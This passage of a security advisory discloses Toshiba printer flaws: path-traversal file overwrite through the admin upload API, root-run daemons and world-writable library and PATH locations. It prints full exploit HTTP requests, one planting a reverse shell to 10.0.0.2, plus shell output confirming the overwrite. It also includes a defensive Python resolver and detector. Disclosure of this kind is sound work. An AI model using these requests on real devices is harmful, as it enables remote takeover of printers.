  • Local privilege escalation and remote code execution using an insecure LD_LIBRARY_PATH

    https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-ld-library-path

  • Local privilege escalation and remote code execution using insecure permissions on 106 programs

    https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-106-programs

  • Local privilege escalation and remote code execution using CISSM

    https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-cissm

An attacker can remotely attack any Toshiba printer.

An attacker can overwrite any insecure file (including programs running as root and Python code).

Details – Multiple authenticated remote code executions as root

Toshiba printers provide several ways to upload files through the administrator web interface.

The vulnerabilities in this chapter are similar to the pre-auth remote code execution as root or apache and multiple local privilege escalations, but they require authentication on the TopAccess interface.

Once an administrator is authenticated, the maintenance interface allows documents to be uploaded through the web interface:

  • upload of driver files;

  • upload of MAC PPD files;

  • upload of Unix filters;

  • upload of driver packages;

  • upload of address books, mailboxes and templates;

  • upload of SSL certificates.

Several web pages with upload forms can be found in the administration interface:

  • http://printer-ip/Administration/maintenance/uploadsoft/UnixList.html

  • http://printer-ip/Administration/maintenance/uploadsoft/UploadList.html

  • http://printer-ip/Administration/maintenance/xmlformat/XmlFormatList.html

  • http://printer-ip/Administration/maintenance/uploadsoft/MacList.html

  • http://printer-ip/Administration/maintenance/import/ImportListFrame.html

  • http://printer-ip/Administration/Languages/InstallLanguagesUpload.html

  • http://printer-ip/Administration/AdminRegistration/ImageIconManagementFrame.html

  • http://printer-ip/Administration/Cloning/CloneFileUpload.html

  • http://printer-ip/Administration/maintenance/uploadsoft/DriverCustomize.html

  • http://printer-ip/Administration/maintenance/uploadsoft/MacList.html

  • http://printer-ip/Administration/maintenance/uploadsoft/PointAndPrintList.html

  • http://printer-ip/Administration/maintenance/uploadsoft/UnixList.html

  • http://printer-ip/Administration/maintenance/uploadsoft/UploadList.html

  • http://printer-ip/Administration/maintenance/xmlformat/XmlFormatList.html

  • http://printer-ip/Administration/maintenance/import/ImportListFrame.html

  • http://printer-ip/Administration/maintenance/backup/BackupList.html

  • http://printer-ip/Administration/Security/Certificates/CertUpload.html

  • http://printer-ip/Administration/MetaScan/XMLFormatFile/XmlFormatList.html

  • http://printer-ip/Administration/Setup/setting/DDNSUpload.html

  • http://printer-ip/Administration/Setup/ServerConnErrRegFileUpload.html

  • http://printer-ip/Administration/Setup/PDLUpload.html

  • http://printer-ip/Administration/Setup/ICCProfile/ImportICCProfile.html

  • http://printer-ip/Administration/SystemUpdates/nSystemUpdatesUpload.html

All of these upload functions are vulnerable: they allow an attacker with administrator privileges to overwrite any file present in the printer.

The vulnerability is probably located in the /home/SYSROM_SRC/build/release/lib/mod_contentwebserver.so.0 library, which implements the /contentwebserver/upload API. It is therefore a single vulnerability that can be reached through the different upload forms.

For example, here are 3 different kinds of upload forms:

Driver file upload

[screenshot: driver file upload form]

Upload of Unix filters

[screenshot: Unix filter upload form]

Upload of address books, mailboxes and templates

[screenshot: address book, mailbox and template upload form]


All these forms are vulnerable, and an attacker can exploit the vulnerability by forging a malicious name value, as shown below. By changing the name value in the HTTP request, an attacker can rewrite any file in the printer.

For example, the /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver shell script can be overwritten by sending a malicious file with the name value /./../../../../../home/SYSROM_SRC/build/common/bin/networkservice/ldapserver.

Upload of a malicious ldapserver shell script:

[screenshot: upload request with the forged name value]

The Cookie and CsrfpId values need to be updated:

POST /contentwebserver/upload HTTP/1.1
Host: 10.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------136357212815291094282690264320
Content-Length: 1056
Origin: http://10.0.0.1:8081
Connection: close
Referer: http://10.0.0.1:8081/Administration/maintenance/uploadsoft/DriverCustomize.html?v=1670278837ta&fileMode=3
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DADMIN%26SUB%3DMAINT%26CAT%3DUPSW; IgnoreSessionTimeout=1; Session=10.0.0.2.3dfcc68624ce6c49d245e33f704a92b3; clicked=0; addrLastVisited=FAVGRP
Upgrade-Insecure-Requests: 1

-----------------------------136357212815291094282690264320
Content-Disposition: form-data; name="formSubmitCompleteEventHandler"

frames[0].formSubmitCompleteUploadList
-----------------------------136357212815291094282690264320
Content-Disposition: form-data; name="DeviceInformationModel"

<DeviceInformationModel><Command><Move><commandNode>FileStorages</commandNode><Params><source><File>script.zip</File><name>Upload</name></source><destination><name>PDPlugin</name></destination></Params></Move></Command></DeviceInformationModel>
-----------------------------136357212815291094282690264320
Content-Disposition: form-data; name="CsrfpId"

10.0.0.2.3dfcc68624ce6c49d245e33f704a92b3
-----------------------------136357212815291094282690264320
Content-Disposition: form-data; name="/./../../../../../home/SYSROM_SRC/build/common/bin/networkservice/ldapserver"; filename="script.zip"
Content-Type: application/zip

#!/bin/sh

bash -i >& /dev/tcp/10.0.0.2/21 0>&1

-----------------------------136357212815291094282690264320--

With this HTTP request, the file /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver is overwritten with the malicious payload.

Before the HTTP request is sent, the file is intact:

bash-4.1# ls -la /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver
-rwxrwxrwx 1 root root 7007 Mar 15 11:45 /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver
bash-4.1# head /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver
#!/bin/bash
LDAP_STARTUP_STATUS=0;

function stop() {
echo "slapd is stopped"
kill -SIGINT `pgrep slapd`
check_stop_process
}

function start() {
bash-4.1#

After the HTTP request is sent, the file has been modified. It now contains the malicious payload:

bash-4.1# ls -la /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver
-rw-rw-rw- 1 apache trusted 52 May 27 16:35 /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver
bash-4.1# cat /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver
#!/bin/sh

bash -i >& /dev/tcp/10.0.0.2/21 0>&1
bash-4.1#

Another form of exploitation, using the driver upload, is shown below. It abuses the same vulnerability. The file /home/SYSROM_SRC/sbin/malicious.program will contain "test".

Uploading /home/SYSROM_SRC/sbin/malicious.program:

POST /contentwebserver/upload HTTP/1.1
Host: 10.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------8960912535828260861374302822
Content-Length: 1813
Origin: http://10.0.0.1:8080
Connection: close
Referer: http://10.0.0.1:8080/Administration/maintenance/uploadsoft/UnixList.html?v=1517352288ta&fileMode=2
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DADMIN%26SUB%3DMAINT%26CAT%3DUPSW; TopAccessURL=http%3A//10.0.0.1%3A8080/%3FMAIN%3DTOPACCESS; SessionID=Session_3e61919e-556b-4be7-8a18-91bb65a4752b; clicked=0; addrLastVisited=ADDRBK; IgnoreSessionTimeout=1; Session=10.0.0.2.cab8f72fb0d8c69e622235cfff9d3cee
Upgrade-Insecure-Requests: 1

-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="formSubmitCompleteEventHandler"

frames[0].formSubmitCompleteUploadList
-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="DeviceInformationModel"

<DeviceInformationModel><Command><Move><commandNode>FileStorages</commandNode><Params><source><File>aix.tar</File><name>Upload</name></source><destination><name>Unix-Filters</name></destination></Params></Move></Command></DeviceInformationModel>
-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="CsrfpId"

10.0.0.2.cab8f72fb0d8c69e622235cfff9d3cee
-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="/./../../../../../home/SYSROM_SRC/sbin/malicious.program"; filename="aix.tar"
Content-Type: application/x-tar

test

-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="hpux.tar"; filename=""
Content-Type: application/octet-stream


-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="hpux64.tar"; filename=""
Content-Type: application/octet-stream


-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="linux.tar"; filename=""
Content-Type: application/octet-stream


-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="openunix.tar"; filename=""
Content-Type: application/octet-stream


-----------------------------8960912535828260861374302822
Content-Disposition: form-data; name="solaris.tar"; filename=""
Content-Type: application/octet-stream


-----------------------------8960912535828260861374302822--

We can confirm that the file has been uploaded to the printer:

bash-4.1# ls -la /home/SYSROM_SRC/sbin/malicious.program
-rw-rw-rw- 1 apache trusted 5 May 27 07:48 /home/SYSROM_SRC/sbin/malicious.program
bash-4.1#

This vulnerability can be turned into remote code execution in many different ways. Because of the other vulnerabilities present in the Toshiba printers, there are hundreds of different ways to reach remote code execution. For example:

  • Uploading a malicious library defined in the LD_PRELOAD variable:

    • /ramdisk/al/libGetNameInfoInterface.so or /ramdisk/al/libGetAddtInfoInterface.so can be overwritten with a malicious library

  • Uploading a malicious library using the LD_LIBRARY_PATH variable – an attacker can upload a malicious library into:

    • /home/SYSROM_SRC/build/release/lib,

    • /mfp/lib,

    • /home/SYSROM_SRC/NoBuildItems/common/lib,

    • /home/SYSROM_SRC/build/thirdparty/plugins/platforminputcontexts/,

    • /home/SYSROM_SRC/build/release/lib.

  • Uploading a malicious program because of insecure permissions:

    • As shown in "Local privilege escalation and remote code execution using insecure permissions on 106 programs", many programs running as root can be overwritten because of their insecure permissions (777)

  • Uploading a malicious Python program or a malicious Python library

  • Replacing Bash scripts

An attacker with administrator privileges can remotely compromise any Toshiba printer.

An attacker with administrator privileges can overwrite any insecurely permissioned file (including programs running as root and Python code).
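The root cause above is a multipart part name being used as a destination path. The following Python is an added example (not code from the original post or from Toshiba's firmware): it shows why that join escapes the upload directory, a hardened resolver that keeps uploads inside the upload root, and a proxy-side check for part names that look like paths. The upload root /ramdisk/uploads, the function names and the sample body are assumptions constructed for the example.

```python
import os
import re
from typing import List

# Constructed upload root standing in for wherever the printer's upload
# handler writes files (the page does not name that directory): an assumption.
UPLOAD_ROOT = "/ramdisk/uploads"

# The part name from the request shown above, reused here as test input.
TRAVERSAL_NAME = "/./../../../../../home/SYSROM_SRC/build/common/bin/networkservice/ldapserver"


def vulnerable_destination(upload_root: str, name: str) -> str:
    """The flawed pattern: the client-controlled part name is joined to the
    upload root as-is. os.path.join drops upload_root entirely when name is
    absolute, and normpath then collapses '/./../..', so the result is the
    path the attacker chose rather than a file under upload_root."""
    return os.path.normpath(os.path.join(upload_root, name))


class UnsafeUploadName(ValueError):
    """Raised when a part name would not stay inside the upload root."""


# A plain file name: starts with an alphanumeric, no separators, no NUL.
_SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")


def safe_destination(upload_root: str, name: str) -> str:
    """Hardened resolver: accept only a plain file name, then verify that the
    resolved target is a direct child of the resolved upload root, so neither
    traversal sequences nor symlink tricks can move the write elsewhere."""
    if not _SAFE_NAME.fullmatch(name):
        raise UnsafeUploadName(f"rejected part name {name!r}")
    root = os.path.realpath(upload_root)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.dirname(target) != root:
        raise UnsafeUploadName(f"{name!r} resolves outside {root}")
    return target


_PART_NAME = re.compile(r'Content-Disposition:\s*form-data;\s*name="([^"]*)"', re.IGNORECASE)


def suspicious_part_names(multipart_body: str) -> List[str]:
    """Proxy/WAF-side detection: return the part names in a multipart body
    that are absolute or contain a parent-directory component. A legitimate
    form field name never looks like a file system path."""
    hits = []
    for match in _PART_NAME.finditer(multipart_body):
        name = match.group(1)
        if name.startswith(("/", "\\")) or ".." in re.split(r"[\\/]", name):
            hits.append(name)
    return hits


# Constructed multipart body modeled on the request above, with a harmless
# payload and a placeholder CSRF token instead of a real session value.
SAMPLE_BODY = "\r\n".join([
    "--boundary",
    'Content-Disposition: form-data; name="formSubmitCompleteEventHandler"',
    "",
    "frames[0].formSubmitCompleteUploadList",
    "--boundary",
    'Content-Disposition: form-data; name="CsrfpId"',
    "",
    "<csrf-token-placeholder>",
    "--boundary",
    f'Content-Disposition: form-data; name="{TRAVERSAL_NAME}"; filename="script.zip"',
    "Content-Type: application/zip",
    "",
    "constructed placeholder payload",
    "--boundary--",
])

if __name__ == "__main__":
    print("vulnerable:", vulnerable_destination(UPLOAD_ROOT, TRAVERSAL_NAME))
    print("safe:      ", safe_destination(UPLOAD_ROOT, "script.zip"))
    print("flagged:   ", suspicious_part_names(SAMPLE_BODY))
```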

Details – Lack of privilege separation

The Toshiba printers do not implement privilege separation. An attacker only needs to compromise one program to compromise the entire printer.

For example, every program except Apache runs as root.

Apache does not run as root, but local privilege escalation can be achieved using one of the following vulnerabilities:

  • Local privilege escalation and remote code execution using snmpd

    https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-snmpd

  • Local privilege escalation and remote code execution using an insecure PATH

    https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-path

  • Local privilege escalation and remote code execution using an insecure LD_PRELOAD

    https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-ld-preload

  • Local privilege escalation and remote code execution using an insecure LD_LIBRARY_PATH

    https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-ld-library-path

  • Local privilege escalation and remote code execution using insecure permissions on 106 programs

    https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-106-programs

Process list on the printer:

bash-4.1# ps auxw
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1740 512 ? Ss 16:34 0:00 init [3]
root 2 0.0 0.0 0 0 ? S 16:34 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 16:34 0:00 [ksoftirqd/0]
[...]
root 1448 0.0 0.7 143680 21860 ? Sl 16:34 0:00 /home/SYSROM_SRC/build/release/bin/slapd -h ldap://127.0.0.1 -f /home/SYSROM_SRC/build/release/etc/openldap/slapd.conf -d 1
root 1460 0.0 0.2 387308 8036 ? Sl 16:34 0:02 /home/SYSROM_SRC/bin/mapper firstboot=0
root 1482 0.0 0.0 26120 2628 ? Ss 16:34 0:00 /usr/local/ebx/httpd_worker/bin/httpd_worker -f /encryption/al/network/config/httpd-prox.conf -k start
apache 1486 0.0 0.1 1264444 3728 ? Sl 16:34 0:00 /usr/local/ebx/httpd_worker/bin/httpd_worker -f /encryption/al/network/config/httpd-prox.conf -k start
[...]
root 1757 0.0 0.2 34388 8176 ? S 16:34 0:00 ./cipollproc
root 1758 0.0 0.2 34432 8180 ? S< 16:34 0:00 ./ciprioritymanager
root 1785 0.3 1.9 815004 59476 ? Sl 16:34 0:51 ./ebx_dl 1539 1537 1540 1 2 3 -T8
root 1786 0.0 0.5 101584 15612 ? S 16:34 0:00 ./de_ipfax 1539 1537 1540 1 2 3 -T8
root 1803 0.0 0.3 38908 9448 ? S 16:34 0:00 ./alnfcplugin
root 1846 0.0 0.0 15544 2788 ? S 16:34 0:00 /home/SYSROM_SRC/bin/eBXDebugLogUtility
root 1850 0.0 0.0 1744 500 ttyS0 Ss+ 16:34 0:00 /sbin/getty 115200 ttyS0
root 1864 0.0 0.4 46528 13060 ? S 16:34 0:00 ./alfilestoragem -T8
root 1866 0.0 0.6 60164 18036 ? S 16:34 0:00 ./alusermgr
root 1867 0.0 0.4 44120 14156 ? S 16:34 0:00 ./allicensemgmt
root 1868 0.0 0.6 56792 18680 ? Sl 16:34 0:00 ./aldeviceserviceplugin
root 1869 0.0 1.4 84708 42192 ? S 16:34 0:03 ./aldeviceconfigplugin
root 1870 0.0 0.6 60856 20516 ? S 16:34 0:01 ./aluserAuthMgr
root 1871 0.0 0.3 41912 11224 ? S 16:34 0:00 ./algrpmgr
root 1872 0.0 0.4 43616 13080 ? S 16:34 0:00 ./alrolemgr
root 1873 0.0 0.5 54708 14972 ? Sl 16:34 0:05 ./alrestrictionmode
root 1874 0.0 0.5 61692 15364 ? Sl 16:34 0:00 ./alsecurityconfiguration
root 1875 0.0 0.3 41408 11008 ? S 16:34 0:00 ./alintegritychkmgr
root 1876 0.3 3.6 482584 108060 ? Sl 16:34 0:43 ./alUiFrameWork legacy -S ramdisk
root 1877 0.0 0.9 92276 26968 ? Sl 16:34 0:01 ./alpanel panel 49 Controller/Settings/autoClear Controller/Information/Locale -T4
root 1878 0.0 0.4 60888 14588 ? S 16:34 0:00 ./aljobtemplatemgr
root 1879 0.0 0.3 42492 11204 ? S 16:34 0:00 ./alLogRetriever -T8
root 1880 0.0 0.4 49340 14248 ? S 16:34 0:00 ./alExportImport -T8
root 1881 0.0 0.4 57852 14596 ? S 16:34 0:00 ./aleFilingmgr -T8
root 1882 0.0 0.4 60244 13020 ? Sl 16:34 0:00 ./alpresentationresourcemgr -T8
root 1883 0.0 0.2 35036 8340 ? S 16:34 0:00 ./alServiceUIPlugin
root 1884 0.0 0.3 45624 10220 ? Sl 16:34 0:00 ./alPanelUIMessageHandler -S ramdisk
root 1885 0.0 0.3 42016 11916 ? S 16:34 0:00 ./alusbmscapplication
root 1886 0.0 0.4 70124 12236 ? Sl 16:34 0:00 ./alViewPlugin
root 1887 0.0 0.4 83200 12652 ? Sl 16:34 0:00 ./alsharedprintDp -T8
root 1888 0.0 0.7 62028 22420 ? S 16:34 0:06 ./alnsm -d9 -m00 -T5
root 1890 0.0 0.5 128920 16292 ? Sl 16:34 0:00 ./aljobcontroller -T8
root 1891 0.0 0.4 118216 12728 ? Sl 16:34 0:00 ./alprintmn -T8
root 1892 0.0 0.3 49888 11220 ? Sl 16:34 0:00 ./alreportsmsgr
root 1893 0.0 0.5 72764 17720 ? Sl 16:34 0:00 ./alreportmanager
root 1922 0.0 0.3 46056 11236 ? S 16:34 0:00 ./almailboxapplication
root 1923 0.0 0.4 44204 13528 ? S 16:34 0:00 ./alsoftwareupdateclient -T8
root 1974 0.0 0.5 56496 15560 ? S 16:34 0:00 ./alifaxreceive -T8
root 1975 0.0 0.4 47184 14844 ? S 16:34 0:00 ./almaintenanceplugin -T6
root 1976 0.0 0.3 41416 11312 ? S 16:34 0:00 ./alpdlfiltermanager
root 1977 0.0 0.4 51736 14524 ? S 16:34 0:00 ./alCloning -T8
root 1978 0.0 0.3 43528 9412 ? Sl 16:34 0:00 ./alPanelStartLEDHandler
root 1979 0.0 0.3 39964 11504 ? S 16:34 0:00 ./alhomedatamgr
root 1980 0.0 0.6 47532 18748 ? S 16:34 0:00 ./sim -T8
root 1981 0.0 0.7 92856 23600 ? Sl 16:34 0:01 ./informationservice -T8
root 1982 0.0 0.2 34624 8476 ? S 16:34 0:00 ./sljobmanagement -T8
root 1985 0.0 0.7 59792 22588 ? Sl 16:34 0:00 ./notificationservice 1284 -T8
root 1986 0.0 0.9 87936 28716 ? Sl 16:34 0:03 ./wfpc -T8
root 1987 0.0 0.3 35524 9156 ? S 16:34 0:00 ./armn -T8
root 2205 0.0 0.4 59596 12808 ? Ss 16:35 0:00 ./wfpc -T8
root 2208 0.0 0.3 59144 11220 ? Ss 16:35 0:00 ./wfpc -T8
root 2327 0.0 0.4 55020 13452 ? S 16:35 0:00 ./alAddressBookMgr
root 2328 0.0 0.5 72396 15208 ? Sl 16:35 0:00 ./alaccountmgr
root 2426 0.0 0.3 46192 10496 ? Sl 16:35 0:00 ./agent_scan 1282 1 -T8
root 2428 0.0 0.3 44272 9844 ? Sl 16:35 0:00 ./agent_faxreceive 1282 2 -T8
root 2430 0.0 0.6 450116 19668 ? Sl 16:35 0:00 ./agent_rip 1282 6 -T8
root 2432 0.0 0.3 47100 10260 ? Sl 16:35 0:00 ./agent_print 1282 15 -T8
root 2433 0.0 0.3 44316 9816 ? Sl 16:35 0:00 ./agent_faxtransmit 1282 16 -T8
root 2434 0.0 0.3 44296 9800 ? Sl 16:35 0:00 ./agent_ipfaxtransmit 1282 31 -T8
root 2435 0.0 0.3 44268 9796 ? Sl 16:35 0:00 ./agent_ipfaxreceive 1282 32 -T8
root 2515 0.0 0.4 54636 13444 ? Sl 16:35 0:00 ./alulm
root 2516 0.0 0.3 249732 9260 ? Sl 16:35 0:00 ./alcbamanager -S ramdisk
root 2614 0.0 0.5 183976 17564 ? Sl 16:35 0:00 ./alappmanager
root 2870 0.0 0.4 54968 14848 ? Sl 16:35 0:00 ./alLogmanager
root 2871 0.0 0.4 46088 13440 ? S 16:35 0:00 ./alhddbackuprestore
[...]
root 3784 0.0 0.4 45704 12760 ? S 16:35 0:00 /home/SYSROM_SRC/build/release/bin/alftpprintd
root 3828 0.0 0.0 15516 2424 ? S 16:35 0:00 /home/SYSROM_SRC/build/release/bin/vsftpd -enableprinting
root 3860 0.1 2.3 201372 70908 ? Sl 16:35 0:25 python /home/SYSROM_SRC/build/release/bin/sapphost.py 10000000-0000-0000-0000-500000000000
root 3935 0.0 0.4 218132 13644 ? Sl 16:35 0:00 /home/SYSROM_SRC/build/release/bin/alhp9100 -f /encryption/al/network/config/hp9100.conf
root 3970 0.1 1.6 144908 48860 ? Sl 16:35 0:24 python /home/SYSROM_SRC/build/release/bin/sapphost.py 10000000-0000-0000-0000-500000000001
root 3992 0.0 0.2 33948 8128 ? S 16:35 0:00 /home/SYSROM_SRC/build/release/bin/snmp_watchdog
root 4025 0.0 0.2 34236 8920 ? S 16:35 0:00 /home/SYSROM_SRC/bin/dnsValidateDaemon
[...]

The printer does not implement privilege separation.

A vulnerability found in any one of the printer's many components is enough to fully compromise the printer.

Details – Local privilege escalation and remote code execution using snmpd

The Toshiba printers are vulnerable to local privilege escalation because of an insecurely permissioned library defined in the snmpd configuration. This local privilege escalation can also be turned into remote code execution by uploading a malicious library.

The snmpd configuration file, located at /encryption/al/network/config/snmpd.conf, loads an external, Toshiba-specific library. The code contained in this library is executed as root (because snmpd runs as root).

Contents of /encryption/al/network/config/snmpd.conf:

dlmod  mibs_impl                        /home/SYSROM_SRC/lib/libalmibs_impl.so

This file is a symbolic link to the library /home/SYSROM_SRC/lib/libalmibs_impl.so.0.

The file /home/SYSROM_SRC/lib/libalmibs_impl.so.0 has incorrect permissions, which allow any local attacker, or any remote attacker using the pre-auth remote code execution (as root or apache) and the multiple local privilege escalation vulnerabilities, to replace it with a malicious library.

bash-4.1# ls -la /home/SYSROM_SRC/lib/libalmibs_impl.so* 
lrwxrwxrwx 1 root root 19 Mar 14 16:27 /home/SYSROM_SRC/lib/libalmibs_impl.so -> libalmibs_impl.so.0
-rwxrwxrwx 1 root root 5239499 Dec 6 03:28 /home/SYSROM_SRC/lib/libalmibs_impl.so.0
bash-4.1#

This file is loaded when snmpd starts. The snmpd program is started at printer boot and is automatically restarted if it crashes.

It is possible to use the "pre-auth remote code execution as root" vulnerability to crash the remote snmpd server, forcing the snmpd daemon to restart, load the malicious library and compromise the printer.

An attacker can remotely compromise any Toshiba printer.

Details – Local privilege escalation and remote code execution using an insecure PATH

The Toshiba printers are vulnerable to local privilege escalation because of an insecure PATH variable. This local privilege escalation can also be turned into remote code execution by uploading a malicious program using the pre-auth remote code execution as root or apache and the multiple local privilege escalation vulnerabilities.

We found that the Toshiba printers are configured with an insecure $PATH variable:

bash-4.1# echo $PATH
/home/SYSROM_SRC/build/release/bin:/home/SYSROM_SRC/build/release/sbin:/home/SYSROM_SRC/build/release/bin:/home/SYSROM_SRC/build/release/sbin:/home/SYSROM_SRC/build/release/bin:/home/SYSROM_SRC/build/release/sbin:/bin:/usr/bin:/sbin:/usr/sbin:/sbin:/bin:/usr/bin:/bin:/usr/bin:/bin:/usr/bin:/bin:/usr/bin:/usr/bin:/sbin:/usr/bin:/usr/bin:/usr/sbin
bash-4.1#

The $PATH variable contains several directories with insecure permissions (777), allowing any attacker to plant malicious programs that are then executed instead of the legitimate ones:

  • /home/SYSROM_SRC/build/release/bin

  • /home/SYSROM_SRC/build/release/sbin

These 2 directories are listed several times and are configured with 777 permissions:

Insecure permissions of /home/SYSROM_SRC/build/release/bin and /home/SYSROM_SRC/build/release:

bash-4.1# ls -la /home/SYSROM_SRC/bin 
lrwxrwxrwx 1 root trust 17 Mar 14 16:34 /home/SYSROM_SRC/bin -> build/release/bin
bash-4.1# ls -la /home/SYSROM_SRC/build/release/bin
total 176508
drwxrwxrwx 2 root root 36864 Mar 15 16:12 .
drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..
lrwxrwxrwx 1 root root 25 Mar 14 16:27 2to3 -> ../../thirdparty/bin/2to3
lrwxrwxrwx 1 root root 29 Mar 14 16:27 2to3-3.5 -> ../../thirdparty/bin/2to3-3.5
-rwxrwxrwx 1 root root 120381 Dec 6 01:56 ALABAMA_Large.ico
-rwxrwxrwx 1 root root 25214 Dec 6 01:56 ALABAMA_Small.ico
-rwxrwxrwx 1 root root 143884 Dec 6 01:56 ALABAMA_f_Large.ico
-rwxrwxrwx 1 root root 25214 Dec 6 01:56 ALABAMA_f_Small.ico
lrwxrwxrwx 1 root root 39 Mar 14 16:27 AppLicenseDataBase -> ../../thirdparty/bin/AppLicenseDataBase
...

Insecure permissions of /home/SYSROM_SRC/build/release/sbin and /home/SYSROM_SRC/build/release:

bash-4.1# ls -la /home/SYSROM_SRC/sbin 
lrwxrwxrwx 1 root root 18 Mar 14 16:34 /home/SYSROM_SRC/sbin -> build/release/sbin
bash-4.1# ls -la /home/SYSROM_SRC/build/release/sbin
total 608
drwxrwxrwx 2 root root 4096 Dec 6 01:40 .
drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..
-rwxrwxrwx 1 root root 4467 Dec 6 01:40 CheckAndRemovePerms.sh
lrwxrwxrwx 1 root root 26 Mar 14 16:27 afpd -> ../../thirdparty/sbin/afpd
lrwxrwxrwx 1 root root 30 Mar 14 16:27 arpaname -> ../../thirdparty/sbin/arpaname
lrwxrwxrwx 1 root root 28 Mar 14 16:27 atalkd -> ../../thirdparty/sbin/atalkd
lrwxrwxrwx 1 root root 30 Mar 14 16:27 cnid_dbd -> ../../thirdparty/sbin/cnid_dbd
lrwxrwxrwx 1 root root 32 Mar 14 16:27 cnid_metad -> ../../thirdparty/sbin/cnid_metad
lrwxrwxrwx 1 root root 34 Mar 14 16:27 ddns-confgen -> ../../thirdparty/sbin/ddns-confgen
...

As a side note, the /home/SYSROM_SRC directory is very insecure, with incorrect permissions used throughout:

bash-4.1# ls -la /home/SYSROM_SRC
total 52
drwxr-xr-x 9 root root 4096 Mar 14 16:34 .
drwxr-xr-x 4 root root 4096 Mar 14 16:28 ..
lrwxrwxrwx 1 root root 30 Mar 14 16:28 CBAHttpServer -> /registration/al/CBAHttpServer
lrwxrwxrwx 1 root root 20 Mar 14 16:27 HDBROOT -> /home/SYSROM_SRC/tmp
drwxrwxrwx 7 root root 4096 Dec 6 00:46 NoBuildItems
lrwxrwxrwx 1 root root 28 Mar 14 16:28 Resources -> /registration/data/Resources
lrwxrwxrwx 1 root root 32 Mar 14 16:28 Resources_eBN -> /registration/data/Resources_eBN
-rwxr-xr-x 1 root root 5614 Mar 14 16:28 Startup.sh
lrwxrwxrwx 1 root root 40 Apr 6 2016 TopAccess -> /home/SYSROM_SRC/build/release/TopAccess
lrwxrwxrwx 1 root root 28 Mar 14 16:28 TopAccessPy -> /registration/al/TopAccessPy
lrwxrwxrwx 1 root root 23 Mar 14 16:28 WebAPI -> /registration/al/WebAPI
lrwxrwxrwx 1 root root 25 Mar 14 16:28 WebPanel -> /registration/al/WebPanel
lrwxrwxrwx 1 root trust 17 Mar 14 16:34 bin -> build/release/bin
drwxr-xr-x 5 root root 4096 Apr 6 2016 build
drwxrwxrwx 2 root root 4096 Dec 6 01:13 config
drwxrwxrwx 3 root root 4096 Mar 14 16:28 data
lrwxrwxrwx 1 root root 17 Mar 14 16:34 etc -> build/release/etc
-rwxr-xr-x 1 root root 1075 Mar 14 16:27 install_rip_ram.sh
drwxrwxrwx 4 root root 4096 Mar 14 16:34 jobdata
lrwxrwxrwx 1 root trust 17 Mar 14 16:34 lib -> build/release/lib
drwxrwxrwx 2 root root 4096 Dec 6 04:48 log
lrwxrwxrwx 1 root root 18 Mar 14 16:34 sbin -> build/release/sbin
-rwxrwxrwx 1 root root 3492 Dec 8 2017 setenv
lrwxrwxrwx 1 root root 19 Mar 14 16:34 share -> build/release/share
drwxr-xr-x 3 root root 4096 Dec 6 04:48 var
bash-4.1#

An attacker can place any malicious program in /home/SYSROM_SRC/build/release/bin or /home/SYSROM_SRC/build/release/sbin, and it will be executed in preference to the legitimate program stored in the regular UNIX directories (/bin, /usr/bin, /sbin, /usr/sbin), because those directories come first in $PATH.

An attacker can remotely compromise any Toshiba printer.

Details – Local privilege escalation and remote code execution using an insecure LD_PRELOAD

The Toshiba printers are vulnerable to local privilege escalation because of an insecure LD_PRELOAD variable. This local privilege escalation can also be turned into remote code execution by uploading a malicious library using the pre-auth remote code execution as root or apache and the multiple local privilege escalation vulnerabilities.

The Toshiba printers are configured with an insecure LD_PRELOAD variable:

bash-4.1# printenv | grep LD_PRELOAD
LD_PRELOAD=/ramdisk/al/libGetNameInfoInterface.so:/ramdisk/al/libGetAddtInfoInterface.so:
bash-4.1#

The $LD_PRELOAD variable contains 2 libraries with insecure permissions (777); any attacker can replace them with malicious libraries, which are then loaded and executed:

